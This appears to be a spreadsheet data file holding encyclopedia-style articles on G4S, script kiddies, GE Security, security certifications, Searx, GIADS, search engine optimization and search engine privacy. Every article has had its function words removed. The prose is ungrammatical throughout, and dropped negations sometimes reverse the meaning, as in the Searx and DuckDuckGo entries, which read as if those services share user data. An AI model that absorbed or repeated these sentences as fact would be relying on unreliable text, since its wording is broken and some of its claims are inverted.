pandemic.prominent gadgets produced g0vhk community include: hong kong address parser vote hong kong (data aggregation 2019 2020 general elections) covid-19 dashboard g0v.it italian branch founded 2019 copernicani npo. projects listed website. also open government radical transparency sunflower movement e-participation references external links official english language website international movement taiwan hong kong</t>
  </si>
  <si>
    <t>G4S</t>
  </si>
  <si>
    <t>british multinational private security company headquartered london, england. company 2004 london-based securicor amalgamated danish firm group falck. company offers range services, including supply security personnel, monitoring equipment, response units secure prisoner transportation. also works governments overseas deliver security services. world's largest security company measured revenues. operations countries. with 533,000 employees, 2012 largest european african private employer.the company criticized involved numerous controversies. formerly dual-listed company listings copenhagen london stock exchanges, purchased allied universal april 2021. history origins origins guarding business founded copenhagen 1901 marius hogrefe, originally known københavn frederiksberg nattevagt (copenhagen frederiksberg night watch) subsequently renamed falck.in 2000, group security firm formed 1960s, merged falck form group falck 2000 company described "the world's largest private security systems company". 2002 group falck went wackenhut corporation united states. 2004 2010 formed july 2004, group falck's security business merged securicor create group securicor began trading copenhagen london stock exchanges. 2005, lars nørby johansen succeeded chief executive nick buckles and, 2006, brand identity, designed russell johnson design agency stylus, rolled across business worldwide. year, duch-pedersen succeeded jorgen philip-sorensen become non-executive chairman business.in 2006, 2007 2008, subject global campaign union workers alleging subsidiaries undermine labour human rights standards. some groups organised banner seiu-funded focus group securicor. this group supported protests group securicor's annual general meeting london 2005.the 2006, state department report human rights indonesia, released march 2006, featured ongoing dispute jakarta group4/securicor. july 2006, indonesian securicor workers substantial campaigners continue support group securicor workers. company disputed claims pointed strong relationships unions around world, including britain. march 2008, announced taking scottish rock steady group steward major sporting music events mostly rock steady events included live8 concerts london, scottish final download festival. april 2008, acquired ronco consulting corporation, world's premier humanitarian commercial mine action, ordnance disposal security companies.in 2008, acquired armorgroup international. gsl, provider outsourced justice services, also acquired 2008. also, month, acquired serbian company progard securitas. 2008, also acquired touchcom, inc. us$23 million. touchcom, inc. located burlington/bedford, massachusetts, area. rebranding touchcom, inc. completed january 2012. december 2008, global union, announced launch ethical employment partnership, drive improvements standards across global security industry. simultaneous this, seiu reached agreement long dispute establish framework work together interest employees.in 2009, continued acquire companies: secura monde international shiremoor international engineering, together, uk's leading specialist banknote high security technical commercial advisory companies; star international million, premier facilities management base operations support companies providing services government; adesta, us-based provider integrated security systems communication systems; hill associates consultants limited, asia's leading provider specialist risk-mitigation consulting services. västberga helicopter robbery occurred september 2009 05:15 cash service depot robbed västberga southern stockholm, sweden. autumn 2009, personnel australia went strike, arguing company subjected poor working conditions. strike imperiled operations court system state victoria. guards provided entry-point screening weapons bombs county court magistrates court, well additional security court rooms themselves. since 2010 acquired south african cash transit company skycom september 2010. then april 2011, bought cotswold group, surveillance investigations company. acquisitions guidance monitoring chubb april 2011, acquired guidance monitoring, international designer manufacturer electronic monitoring technologies, including hardware software used offender monitoring tracking. december 2011, acquired assets chubb emergency response, large holding company deal finalised december 2011. business integrated existing holding response service. aborted acquisition october 2011, announced would purchase denmark-based facilities management group £5.2 billion. acquisition would created world's largest facilities management company. within weeks, deal dropped lack shareholder support. g4s's chief, nick buckles, recounted events failed acquisition, cost company tens millions dollars, "...one bruising experiences life". combination institutional investors response minority shareholders followed, objected variety factors, least additional leverage debt deal would introduce g4s's balance sheet. general consensus lack planning shareholder response side doomed deal. furthermore, many investors analysts questioned company would want purchase firm removed area expertise. duch-pedersen resigned chairman failure acquisition replaced john connolly. management changes march 2012, announced would sell "struggling" government solutions business (the former wackenhut (wsi) star business) exit government services. 2013, buckles resigned chief executive £1.2 million payoff replaced ashley almanza. failure meet london 2012 security contract july 2012, announced 3,500 british troops would deployed 2012 summer olympics shortage adequately trained security staff, labour keith claiming that, "g4s country literally send troops". shares later dropped nine percent firm claimed faced possible million loss result failing provide sufficient trained staff 2012 olympic games. july, company's chief executive, nick buckles, appeared home affairs select committee, apologised organisational failings, expressed regret taken olympic security contract, agreed principle bonuses soldiers drafted last moment replacement security staff. pressed labour david winnick, forced admit organisational situation become "humiliating shambles".in newcastle, replaced staff local security firms olympic events. scotland, stripped security role passing strathclyde police. dorney lake, olympic rowing canoeing venue, manager reported radios working, staff relying personal mobile phones communicate; confirmed venue manned military personnel percent rostered staff failing show. venue manager reported parts cctv system already replaced army patrols complete army takeover cards".on july 2012, contractor reported third expected staff turned instead, sent group mainly female, teenage students minimal training, turned away feel comfortable leaving night duties. august 2012, announced finally contracted enough employees fully fulfil contract olympic games. although missing initial target 10,000, announced sending 7,000 personnel olympic venues, felt would allow fully secure venue. subsequent olympics contract failures, chief constables bedfordshire, cambridgeshire hertfordshire recommend abandoning outsourcing work g4s. they backed paice, agriculture minister conservative south east cambridgeshire. following olympic games, provided donation £2.5 million military charities goodwill gesture. sale wackenhut pakistan announced late august 2012 would selling pakistan division, wackenhut pakistan limited, chairman ikram sehgal figure around million, according financial times.sehgal disputed figure, calling "speculative" express tribune. public award nominees 2013 public award, counter-event created ngos, awards worst company year. employee omar mateen orlando massacre connection news june 2016 employee omar mateen, gunman behind worst mass-shooting incidents united states history (where killed), employed security guard company. october 2006, mateen begun working recruit florida department corrections, assigned martin correctional institution. letter explaining juvenile record part successful application, mateen explained incident arrested school fourteen. following virginia tech shooting april 2007, mateen suggested corrections officer training class would bring class. p.h. skipper, warden institution, wrote light tragic events virginia tech officer mateen's inquiry bringing weapon class best extremely disturbing". days later april 2007, mateen "was involuntarily dismissed" program never became certified corrections officer.mateen worked british-based security firm secure solutions jupiter, florida, september 2007 death. company said screenings mateen—one conducted upon hiring 2013—had raised flags. nonetheless, removed mateen post courthouse threats made towards coworkers, including threat claimed would al-qaeda kill deputy's family. mateen claimed coworkers courthouse deputies making racist comments towards him. despite this, "kept mateen employee" moved kiosk gated community palm beach county." they never informed community property management company transferred there.mateen held active concealed carry permit armed security guard licence. said passed psychological test medical exam performed syed shafeeq rahman, close ties mateen's family. also noted mateen criminal record. according licensing records, proficient shooter scored 98th percentile semiautomatic pistol.after shooting, psychologist, said evaluated cleared mateen firearms licence 2007, according records security company g4s, denied ever meeting lived florida time, said stopped practice florida january 2006. admitted mateen's form "clerical error", clarified instead cleared rahman, firm bought wrongly-named doctor's practice. rahman interviewed mateen, evaluated results standard test used screening undertook hired. birmingham prison december 2016, prisoners took part riot prison birmingham, prison birmingham, england, operated g4s. disturbance described worst britain since 1990 strangeways riot. national chairman prison officers association said officers prison quit weeks riot prison convulsions inevitable.in statement parliament, secretary state justice elizabeth truss said insufficient staffing root twelve-hour birmingham riot would costs deploying highly trained public sector tornado elite teams, sent quell riot. john thornhill, president independent monitoring board, agreed insufficient staff caused rising levels violence prisons england wales, leading "unrestrained violence" transfer "large number prisoners prisons already stretched problems staffing issues."in august 2018 contract birmingham prison revoked, peter clarke, government's chief inspector prisons reported worst ever visited. profit margins saunders, head british immigrant centres locus abuse detainees leave september 2017. parliamentary committee chair opposition labour shadow home secretary complained g4s's contract home office limited 6.8% profit operations, instead pre-tax profit margins appear ranged 30%. saunders previously directed medway secure training centre juveniles found abused divested youth detention component. acquisition allied universal late 2020 gardaworld allied universal made takeover offers company. february 2021 allied universal offer accepted delisted copenhagen london stock exchanges. april 2021, acquisition completed. operations activities g4s's core services include 'manned security services' provides trained screened security officers. company also provides 'security systems' access control, cctv, intruder alarms, fire detection, video analytics security building systems integration technology. 'monitoring response services' another core service, provides holding, mobile security patrol response services alarm receiving monitoring facilities. also provides 'secure facilities services' includes integrated facilities services entire sites estates commercial customers governments. business provides 'risk management consultancy services' also includes mine detection clearance services. also provides electronic tagging monitoring offenders home community. company provides back-office support functions police forces, support front-line policing, including provision custody suite services forensic medical services. also manages juvenile adult custody centres. this includes management aspects facility held within facility similar centres also used detention asylum applicants. prisoner escorting another core service. transports prisoners asylum applicants courts, police stations custody centres.in early 2000s, company (then still known group falck) unsuccessfully right operate several railway franchises united kingdom.in 2013, forensic medical services awarded three-year contract services providing medical examinations counselling victims rape sexual assault west midlands. working area since 2005. firm provides patient transport services trusts including barking, havering redbridge university hospitals trust; surrey sussex healthcare trust; george's healthcare trust (£2.7 million year), epsom helier university hospitals trust (£3.5 million year).in 2014, austrian ministry interior awarded contract detention center vordernberg; first privately operated prison austria.one g4s' interesting contracts securing perimeter homey airport, commonly known area secret united states force base nevada. base guarded civilians forces referred watch base cammo dudes.as 2018, operates private prisons australia: mount gambier prison port phillip prison. operating structure segments business areas: secure solutions includes services commercial government organisations areas risk consulting, manned security, security systems. cash solutions outsourcing cash cycle management banks, financial institutions retailers making percent g4s's turnover. corporate social responsibility 2011, became signatory global compact, international standard promote socially responsible business behaviour including human rights, labour, environment anti-corruption. 2013, launched human rights policy, co-authored human rights expert hugo slim, aiming align company's practices united nations guiding principles business human rights introduce additional global guidelines areas currently covered existing standards.g4s founder signatory international code conduct private security service providers (icoc), multi-stakeholder initiative convened swiss government. sponsorships 2007, began 4teen, award-winning program support young athletes around world. provided financial, social logistical support number athletes taking part london 2012, including colombian cyclist 2012 2016 olympic gold medallist mariana pajón, kenyan long-distance runner pauline korikwiang, estonia's former discus thrower shot-putter, now-indianapolis colts defensive margus hunt. controversies controversies involving company included immigrant-detainee labour prisons, extreme misconduct child custodial institutions allegations police telephone data manipulation, troubled nine-year employment orlando, florida terrorist omar mateen, 2016 riot birmingham prison birmingham, england. references external links official website company profile yahoo finance</t>
  </si>
  <si>
    <t>Script kiddie</t>
  </si>
  <si>
    <t>script kiddie, s'kiddie, skid relatively unskilled individual uses scripts programs, shell, developed others attack computer systems networks deface websites, according programming hacking cultures. generally assumed script kiddies juveniles lack ability write sophisticated programs exploits objective impress friends gain credit computer-enthusiast communities. however, term necessarily relate actual participant. characteristics carnegie mellon report prepared u.s. department defense 2005, script kiddies defined immature unfortunately often dangerous exploiter security lapses internet. typical script kiddy uses existing frequently well known easy-to-find techniques programs scripts search exploit weaknesses computers internet—often randomly little regard perhaps even understanding potentially harmful consequences. script kiddies disposal large number effective, easily downloadable programs capable breaching computers networks.script kiddies vandalize websites thrill increase reputation among peers. some malicious script kiddies used virus toolkits create propagate anna kournikova love viruses. script kiddies lack, developing, programming skills sufficient understand effects side effects actions. result, leave significant traces lead detection, directly attack companies detection countermeasures already place, cases, leave automatic crash reporting turned on.one common types attack utilized script kiddies involves form social engineering, whereby attacker somehow manipulates tricks user sharing information. this often done creation fake websites users input login form phishing), thus allowing script kiddie access account. game hacking subculture hacking programming communities, cheat developers, responsible development maintenance clients. these individuals must circumvent target program's security features become undetected anti-cheat. script kiddies known download slightly modify something cheat developer created. also black hacker exploit (computer security) hacker (computer security) hacktivism lamer list convicted computer criminals luser noob shell, tool script kiddies frequently references further reading samuel chng, ayush kumar, david (mar 2022). "hacker types, motivations strategies: comprehensive framework". computers human behavior reports. issn 2451-9588. retrieved 2022.{{cite journal}}: maint: multiple names: authors list (link) tapeworm (2005). 1337 h4x0r h4ndb00k. sams publishing. isbn 0-672-32727-9. intrusion: real stories behind exploits hackers, intruders deceivers (2005) isbn 978-0471782667 external links honeynet.org know your enemy (essay script kiddies) preserved internet archive cracking hacker mindset</t>
  </si>
  <si>
    <t>GE Security</t>
  </si>
  <si>
    <t>security division general electric's enterprise solutions. acquired march 2010, became part fire security. security's division provides intrusion alarm systems, integrated security systems, fire systems, access control, video surveillance, explosives illegal drug detection, control/lockbox, fiber optic transmission, machine guarding, more. security based bradenton, florida. history security mainly aimed businesses, organizations, governments, products security available residents small businesses. security included different families detection systems, web-based surveillance systems, aviation security products, handheld walk-thru explosive/narcotics portals. much general electric's fire systems came acquisition edwards systems technology corporation 2005. november 2009, security announced signed definitive agreement united technologies corporation acquire ge's security business $1.82 billion. transaction approved boards companies, sale closed march 2010. after utc's 2020 merger raytheon, security's remains part carrier global. warned consumers ongoing scams related security home security products telemarketers door-to-door salespeople falsely work security attempt sell home security systems even though manufactured, sold, marketed home security equipment since 2016. references</t>
  </si>
  <si>
    <t>List of computer security certifications</t>
  </si>
  <si>
    <t>computer security information security fields, number tracks professional take demonstrate qualifications. four sources categorizing these, many credentials, licenses, certifications, are: schools universities vendor-sponsored credentials (e.g. microsoft, cisco) association- organization-sponsored credentials governmental quasi-governmental) licenses, certifications, credentialsquality acceptance vary worldwide security credentials, well-known high-quality examples like master's degree field accredited school, cissp, microsoft certification, controversial list many dozens lesser-known credentials organizations. addition certification obtained taking courses and/or passing exams (and case cissp others noted below, demonstrating experience and/or recommended given reference existing credential holder), award certificates also given winning government, university industry-sponsored competitions, including team competitions contests. scope note: this article certification credentialing individuals. include certification organizations classified computer systems authorizing, accrediting, approval bodies authorities meeting prescribed safeguards. certifying organizations vendor-neutral asis international apmg international blockchain council blockchain training alliance certnexus comptia crest crypto consortium cloud security alliance (csa) cyber struggle council eitca/is elearnsecurity exin gaqm giac hispi iacrb ibitgq security iapp isaca isecom isc2 lunarline mcafee institute mile2 offensive security open group pentester academy seco-institute sabsa star certification zero-point security first vendor-specific alibaba (cloud) cisco check point fortinet google jamf juniper microsoft kali opentext palo alto redhat symantec, (since 2015 nortonlifelock) list certifications vendor-neutral vendor-specific also computer security information security notes references external links</t>
  </si>
  <si>
    <t>Searx</t>
  </si>
  <si>
    <t>searx stylized searx) free open-source metasearch engine, available affero general public license version protecting privacy users. end, searx share users' addresses search history search engines gathers results. tracking cookies served search engines blocked, preventing user-profiling-based results modification. default, searx queries submitted http post, prevent users' query keywords appearing webserver logs. searx inspired seeks project, though implement seeks' peer-to-peer user-sourced results ranking. each search result given direct link respective site, rather tracked redirect link used google. addition, available, direct links accompanied cached and/or proxied links allow viewing results pages without actually visiting sites question. cached links point saved versions page wayback machine, proxied links allow viewing current live page searx-based proxy. addition general search, engine also features tabs search within specific domains: files, images, maps, music, news, science, social media, videos.users private instances searx computer, also many public, user-run, searx instances, available hidden services. meta-searx instances also used forward search query random public instance. public available searx, well firefox search provider plugins. search engines settings across categories, searx fetch search results different engines. this includes major search engines site-specific searches like bing, google, reddit, wikipedia, yahoo, yandex. engines used search category "preferences" interface, settings saved cookie user's browser, rather server side, since privacy reasons, searx implement user login model. other settings search interface language search results language (over languages available) way.in addition preferences cookie, possible query modify engines used, search categories selected, and/or languages search specifying following textual search operators search keywords. !category search specified category instead default ones. ?category search specified category addition default ones. !engine search specified engine instead default ones. ?engine search specified engine addition default ones. :language search results specified language instead default one.the operators specified select multiple categories engines, example !google !deviantart ?images :japanese cow. instances user instance searx, done maximize privacy, avoid congestion public instances, preserve customized settings even browser cookies cleared, allow auditing source code run, etc. users include searx instances editable list public instances, keep private. also possible custom search engines self-hosted instance available public instances.another reason different searx instances, and/or one's own, 2019, google begun block instances, including addresses used searx.me (former instance developer), querying resulting "google (unexpected crash: captcha required)" error. response, instances modified silently skip trying search google, even engine specified. also list meta search engines comparison search engines search engine privacy footnotes references external links official website</t>
  </si>
  <si>
    <t>GIADS</t>
  </si>
  <si>
    <t>giads german improved defence system standard command control system (acc system system) german force tactical command control service (gaf taccs). definition giads standard system taccs. operated static control reporting centres (crc erndtebrück schönewalde) deployable holzdorf base) order provide airspace surveillance, control force operations, meet military commitment bundeswehr. history year 2000 standard system taccs arkona taken former former east german force. time come replaced successor system giads. july 2000 first giads schönewalde became operational. since time giads improve, developed introduced german crcs (including deployable crc). introduction giads 2010/11, probable final system's generation might procured. prospect giads replaced line joint nato procurement programme successor product, command control system (accs). functionality coincident parallel radar data processing different civil/military sensors data sources correlation civil flight plan data processing recognized picture (rap) control military aircraft surface missile (sam) units data recording replay function processing 12,000 plots; 3,000 system tracks 1,000 flight plan icao mode capability advantages comparison arkona automatic selection beneficial radar data source multi-sensor-tracking decisive enhancement fighter control capability nato link capability (interim disposal solution) enhanced support (e.g. emergence cases, space violations, critical vehicles) data exchange external systems improved it-security in-service support management material command, followed weapon systems command (de: waffensystemkommando luftwaffe wasyskdolw), charge giads in-service support management (issm). today provides obsolescence management, hardware software configuration control software related instructions eads, charge giads software change maintenance. sources years taccs 1960 2010, fölbach 2001, www.foelbach.de mil. glossary studies, federal office foreign languages (de: studienglossar, bundessprachenamt) 50354, actual issue external links luftwaffe official website german) taccs homepage german crcs homepage</t>
  </si>
  <si>
    <t>Search engine optimization</t>
  </si>
  <si>
    <t>search engine optimization (seo) process improving quality quantity website traffic website page search engines. targets unpaid traffic (known "natural" "organic" results) rather direct traffic paid traffic. unpaid traffic originate different kinds searches, including image search, video search, academic search, news search, industry-specific vertical search engines. internet marketing strategy, considers search engines work, computer-programmed algorithms dictate search engine behavior, people search for, actual search terms keywords typed search engines, search engines preferred targeted audience. performed website receive visitors search engine websites rank higher search engine results page (serp). these visitors potentially converted customers. history webmasters content providers began optimizing websites search engines mid-1990s, first search engines cataloging early web. initially, webmasters needed submit address page, url, various engines would send crawler crawl page, extract links pages return information found page indexed. process involves search engine spider downloading page storing search engine's server. second program, known indexer, extracts information page, words contains, located, weight specific words, well links page contains. information placed scheduler crawling later date. website owners recognized value high ranking visibility search engine results, creating opportunity white black practitioners. according industry analyst danny sullivan, phrase "search engine optimization" probably came 1997. sullivan credits bruce clay first people popularize term.early versions search algorithms relied webmaster-provided information keyword meta index files engines like aliweb. meta tags provide guide page's content. using metadata index pages found less reliable, however, webmaster's choice keywords meta could potentially inaccurate representation site's actual content. flawed data meta tags accurate, complete, falsely attributes created potential pages mischaracterized irrelevant searches. content providers also manipulated attributes within html source page attempt rank well search engines. 1997, search engine designers recognized webmasters making efforts rank well search engine, webmasters even manipulating rankings search results stuffing pages excessive irrelevant keywords. early search engines, altavista infoseek, adjusted algorithms prevent webmasters manipulating rankings.by heavily relying factors keyword density, exclusively within webmaster's control, early search engines suffered abuse ranking manipulation. provide better results users, search engines adapt ensure results pages showed relevant search results, rather unrelated pages stuffed numerous keywords unscrupulous webmasters. this meant moving away heavy reliance term density holistic process scoring semantic signals. since success popularity search engine determined ability produce relevant results given search, poor quality irrelevant search results could lead users find search sources. search engines responded developing complex ranking algorithms, taking account additional factors difficult webmasters manipulate. companies employ overly aggressive techniques client websites banned search results. 2005, wall street journal reported company, traffic power, allegedly used high-risk techniques failed disclose risks clients. wired magazine reported company sued blogger aaron wall writing ban. google's matt cutts later confirmed google fact traffic power clients.some search engines also reached industry, frequent sponsors guests conferences, webchats, seminars. major search engines provide information guidelines help website optimization. google sitemaps program help webmasters learn google problems indexing website also provides data google traffic website. bing webmaster tools provides webmasters submit sitemap feeds, allows users determine "crawl rate", track pages index status. 2015, reported google developing promoting mobile search feature within future products. response, many brands began take different approach internet marketing strategies. relationship google 1998, graduate students stanford university, larry page sergey brin, developed "backrub", search engine relied mathematical algorithm rate prominence pages. number calculated algorithm, pagerank, function quantity strength inbound links. pagerank estimates likelihood given page reached user randomly surfs web, follows links page another. effect, means links stronger others, higher pagerank page likely reached random surfer. page brin founded google 1998. google attracted loyal following among growing number internet users, liked simple design. off-page factors (such pagerank hyperlink analysis) considered well on-page factors (such keyword frequency, meta tags, headings, links site structure) enable google avoid kind manipulation seen search engines considered on-page factors rankings. although pagerank difficult game, webmasters already developed link building tools schemes influence inktomi search engine, methods proved similarly applicable gaming pagerank. many sites focused exchanging, buying, selling links, often massive scale. some schemes, link farms, involved creation thousands sites sole purpose link spamming.by 2004, search engines incorporated wide range undisclosed factors ranking algorithms reduce impact link manipulation. june 2007, york times' saul hansell stated google ranks sites using different signals. leading search engines, google, bing, yahoo, disclose algorithms rank pages. some practitioners studied different approaches search engine optimization, shared personal opinions. patents related search engines provide information better understand search engines. 2005, google began personalizing search results user. depending history previous searches, google crafted results logged users.in 2007, google announced campaign paid links transfer pagerank. june 2009, google disclosed taken measures mitigate effects pagerank sculpting nofollow attribute links. matt cutts, well-known software engineer google, announced google would longer treat nofollow links, way, prevent service providers using nofollow pagerank sculpting. result change usage nofollow evaporation pagerank. order avoid above, engineers developed alternative techniques replace nofollowed tags obfuscated javascript thus permit pagerank sculpting. additionally several solutions suggested include usage iframes, flash javascript.in december 2009, google announced would using search history users order populate search results. june 2010 indexing system called google caffeine announced. designed allow users find news results, forum posts content much sooner publishing before, google caffeine change google updated index order make things show quicker google before. according carrie grimes, software engineer announced caffeine google, "caffeine provides percent fresher results searches last index..." google instant, real-time-search, introduced late 2010 attempt make search results timely relevant. historically site administrators spent months even years optimizing website increase search rankings. with growth popularity social media sites blogs, leading engines made changes algorithms allow fresh content rank quickly within search results.in february 2011, google announced panda update, penalizes websites containing content duplicated websites sources. historically websites copied content another benefited search engine rankings engaging practice. however, google implemented system punishes sites whose content unique. 2012 google penguin attempted penalize websites used manipulative techniques improve rankings search engine. although google penguin presented algorithm aimed fighting spam, really focuses spammy links gauging quality sites links coming from. 2013 google hummingbird update featured algorithm change designed improve google's natural language processing semantic understanding pages. hummingbird's language processing system falls newly recognized term "conversational search" system pays attention word query order better match pages meaning query rather words. with regards changes made search engine optimization, content publishers writers, hummingbird intended resolve issues getting irrelevant content spam, allowing google produce high-quality content rely 'trusted' authors. october 2019, google announced would start applying bert models english language search queries bidirectional encoder representations transformers (bert) another attempt google improve natural language processing time order better understand search queries users. terms search engine optimization, bert intended connect users easily relevant content increase quality traffic coming websites ranking search engine results page. methods getting indexed leading search engines, google, bing yahoo!, crawlers find pages algorithmic search results. pages linked search engine indexed pages need submitted found automatically. yahoo! directory dmoz, major directories closed 2014 2017 respectively, required manual submission human editorial review. google offers google search console, sitemap feed created submitted free ensure pages found, especially pages discoverable automatically following links addition submission console. yahoo! formerly operated paid submission service guaranteed crawling cost click; however, practice discontinued 2009. search engine crawlers look number different factors crawling site. every page indexed search engines. distance pages root directory site also factor whether pages crawled.today, people searching google using mobile device. november 2016, google announced major change crawling websites started make index mobile-first, means mobile version given website becomes starting point google includes index. 2019, google updated rendering engine crawler latest version chromium time announcement). google indicated would regularly update chromium rendering engine latest version. december 2019, google began updating user-agent string crawler reflect latest chrome version used rendering service. delay allow webmasters time update code responded particular user-agent strings. google evaluations felt confident impact would minor. preventing crawling avoid undesirable content search indexes, webmasters instruct spiders crawl certain files directories standard robots.txt file root directory domain. additionally, page explicitly excluded search engine's database using meta specific robots (usually &lt;meta name="robots" content="noindex"&gt; when search engine visits site, robots.txt located root directory first file crawled. robots.txt file parsed instruct robot pages crawled. search engine crawler keep cached copy file, occasion crawl pages webmaster wish crawled. pages typically prevented crawled include login-specific pages shopping carts user-specific content search results internal searches. march 2007, google warned webmasters prevent indexing internal search results pages considered search spam. 2020 google sunsetted standard (and open-sourced code) treats hint directive. adequately ensure pages indexed page-level robot's meta included. increasing prominence variety methods increase prominence webpage within search results. cross linking pages website provide links important pages improve visibility. page design makes users trust site want stay find when people bounce site, counts site affects credibility. writing content includes frequently searched keyword phrases, relevant wide variety search queries tend increase traffic. updating content keep search engines crawling back frequently give additional weight site. adding relevant keywords page's metadata, including title meta description, tend improve relevancy site's search listings, thus increasing traffic. canonicalization pages accessible multiple urls, using canonical link element redirects help make sure links different versions count towards page's link popularity score. these known incoming links, point count towards page link's popularity score, impacting credibility website. also, recent times google giving priority elements serp (search engine ranking position). https version (secure site) page speed structured data mobile compatibility (accelerated mobile pages) bert white versus black techniques techniques classified broad categories: techniques search engine companies recommend part good design ("white hat"), techniques search engines approve ("black hat"). search engines attempt minimize effect latter, among spamdexing. industry commentators classified methods, practitioners employ them, either white seo, black seo. white hats tend produce results last long time, whereas black hats anticipate sites eventually banned either temporarily permanently search engines discover doing.an technique considered white conforms search engines' guidelines involves deception. search engine guidelines written series rules commandments, important distinction note. white following guidelines ensuring content search engine indexes subsequently ranks content user see. white advice generally summed creating content users, search engines, making content easily accessible online "spider" algorithms, rather attempting trick algorithm intended purpose. white many ways similar development promotes accessibility, although identical. black attempts improve rankings ways disapproved search engines, involve deception. black technique uses hidden text, either text colored similar background, invisible div, positioned off-screen. another method gives different page depending whether page requested human visitor search engine, technique known cloaking. another category sometimes used grey seo. this black white approaches, methods employed avoid site penalized producing best content users. grey entirely focused improving search engine rankings. search engines penalize sites discover using black grey methods, either reducing rankings eliminating listings databases altogether. such penalties applied either automatically search engines' algorithms, manual site review. example february 2006 google removal germany ricoh germany deceptive practices. both companies, however, quickly apologized, fixed offending pages, restored google's search engine results page. marketing strategy appropriate strategy every website, internet marketing strategies effective, paid advertising click (ppc) campaigns, depending site operator's goals. search engine marketing (sem) practice designing, running optimizing search engine campaigns. difference simply depicted difference paid unpaid priority ranking search results. focuses prominence relevance; website developers regard utmost importance consideration visibility navigate primary listings search. successful internet marketing campaign also depend upon building high-quality pages engage persuade internet users, setting analytics programs enable site owners measure results, improving site's conversion rate. november 2015, google released full 160-page version search quality rating guidelines public, revealed shift focus towards "usefulness" mobile local search. recent years mobile market exploded, overtaking desktops, shown statcounter october 2016 analyzed million websites found 51.3% pages loaded mobile device. google companies utilizing popularity mobile usage encouraging websites google search console, mobile-friendly test, allows companies measure website search engine results determine user-friendly websites are. closer words together, ranking improve based terms. generate adequate return investment. however, search engines paid organic search traffic, algorithms change, guarantees continued referrals. lack guarantee uncertainty, business relies heavily search engine traffic suffer major losses search engines stop sending visitors. search engines change algorithms, impacting website's search engine ranking, possibly resulting serious loss traffic. according google's ceo, eric schmidt, 2010, google made algorithm changes almost day. considered wise business practice website operators liberate dependence search engine traffic. addition accessibility terms crawlers (addressed above), user accessibility become increasingly important seo. international markets optimization techniques highly tuned dominant search engines target market. search engines' market shares vary market market, competition. 2003, danny sullivan stated google represented searches. markets outside united states, google's share often larger, google remains dominant search engine worldwide 2007. 2006, google 85–90% market share germany. while hundreds firms time, five germany. june 2008, market share google close according hitwise. that market share achieved number countries. 2009, large markets google leading search engine. cases, google leading given market, lagging behind local player. notable example markets china, japan, south korea, russia, czech republic respectively baidu, yahoo! japan, naver, yandex seznam market leaders. successful search optimization international markets require professional translation pages, registration domain name level domain target market, hosting provides local address. otherwise, fundamental elements search optimization essentially same, regardless language. legal precedents october 2002, searchking filed suit united states district court, western district oklahoma, search engine google. searchking's claim google's tactics prevent spamdexing constituted tortious interference contractual relations. 2003, court granted google's motion dismiss complaint searchking "failed state claim upon relief granted."in march 2006, kinderstart filed lawsuit google search engine rankings. kinderstart's website removed google's index prior lawsuit, amount traffic site dropped 70%. march 2007, united states district court northern district california (san jose division) dismissed kinderstart's complaint without leave amend, partially granted google's motion rule sanctions kinderstart's attorney, requiring part google's legal expenses. also references external links development promotion curlie webmaster guidelines google google search quality evaluators guidelines (pdf) webmaster resources yahoo! webmaster guidelines microsoft bing dirty little secrets search york times (february 2011) google 2010 site advice experts youtube technical tutorial search engine optimization, given google 2010</t>
  </si>
  <si>
    <t>Search engine privacy</t>
  </si>
  <si>
    <t>search engine privacy subset internet privacy deals user data collected search engines. both types privacy fall umbrella information privacy. privacy concerns regarding search engines take many forms, ability search engines individual search queries, browsing history, addresses, cookies users, conducting user profiling general. collection personally identifiable information (pii) users search engines referred "tracking".this controversial search engines often claim collect user's data order better tailor results specific user provide user better searching experience. however, search engines also abuse compromise users' privacy selling data advertisers profit. absence regulations, users must decide important search engine experience: relevance speed results privacy, choose search engine accordingly.the legal framework protecting user privacy solid. popular search engines collect personal information, search engines focused privacy cropped recently. there several well publicized breaches search engine user privacy occurred companies like yahoo. individuals interested preserving privacy, options available them, using software like makes user's location personal information anonymous using privacy focused search engine. privacy policies search engines generally publish privacy policies inform users data collected purposes used for. while policies attempt transparency search engines, many people never read therefore unaware much private information, like passwords saved files, collected cookies logged kept search engine. this ties phenomenon notice consent, many privacy policies structured. notice consent policies essentially consist site showing user privacy policy click agree. this intended user freely decide whether ahead website. this decision, however, actually made freely costs opting high. another issue putting privacy policy front users accept quickly often hard understand, even unlikely case user decides read them. privacy minded search engines, duckduckgo, state privacy policies collect much less data search engines google yahoo, collect any. 2008, search engines business selling user data third parties, though note privacy policies comply government subpoenas. google yahoo google, founded 1998, widely used search engine, receiving billions billions search queries every month. google logs search terms database along date time search, browser operating system, address user, google cookie, shows search engine search query. privacy policy google states pass user data various affiliates, subsidiaries, "trusted" business partners.yahoo, founded 1995, also collects user data. well-known fact users read privacy policies, even services daily, yahoo! mail gmail. this persistent failure consumers read privacy policies disadvantageous pick differences language privacy policies, judges court cases certainly this means search engine email companies like google yahoo technically able keep practice targeting advertisements based email content since declare privacy policies. study done much consumers cared privacy policies google, specifically gmail, detail, determined users often thought google's practices somewhat intrusive users would often willing counteract paying premium privacy. duckduckgo duckduckgo, founded 2008, claims privacy focused. duckduckgo collect share personal information users, addresses cookies, search engines usually keep time. also spam, protects user privacy anonymizing search queries website user chooses using encryption. similarly privacy oriented search engines include startpage disconnect. types data collected search engines most search engines can, collect personal information users according privacy policies. this user data could anything location information cookies, addresses, search query histories, click-through history, online fingerprints. this data often stored large databases, users assigned numbers attempt provide anonymity. data stored extended period time. example, data collected google users retained months. some studies state number actually months. this data used various reasons optimizing personalizing search results users, targeting advertising, trying protect users scams phishing attacks. such data collected even user logged account using different address using cookies. uses user profiling personalization what search engines often collected information user's habits create profile them, helps search engine decide links show different search queries submitted user target with. interesting development field invention automated learning, also known machine learning. using this, search engines refine profiling models accurately predict given user want click testing results offered users measuring reactions users.companies like google, netflix, youtube, amazon started personalizing results more. notable example google scholar takes account publication history user order produce results deems relevant. personalization also occurs amazon recommends books imdb suggests movies using previously collected information user predict tastes. personalization occur, user need even logged account. targeted advertising internet advertising company doubleclick, helps advertisers target users specific ads, bought google 2008 subsidiary june 2018, google rebranded merged doubleclick google marketing platform. doubleclick worked depositing cookies user's computers would track sites visited doubleclick them. there privacy concern google process acquiring doubleclick acquisition would google create even comprehensive profiles users since would collecting data search queries additionally tracking websites visited. this could lead users shown increasingly effective behavioral targeting. with effective comes possibility purchases consumers made otherwise. 1994, conflict selling relevance results search engines began. this sparked development cost-per-click model, challenged methods already-created cost-per-mille model. cost-per-click method directly related users searched, whereas cost-per-mille method directly influenced much company could matter many times people interacted improving search quality besides targeting personalization, google also uses data collected users improve quality searches. search result click histories query logs 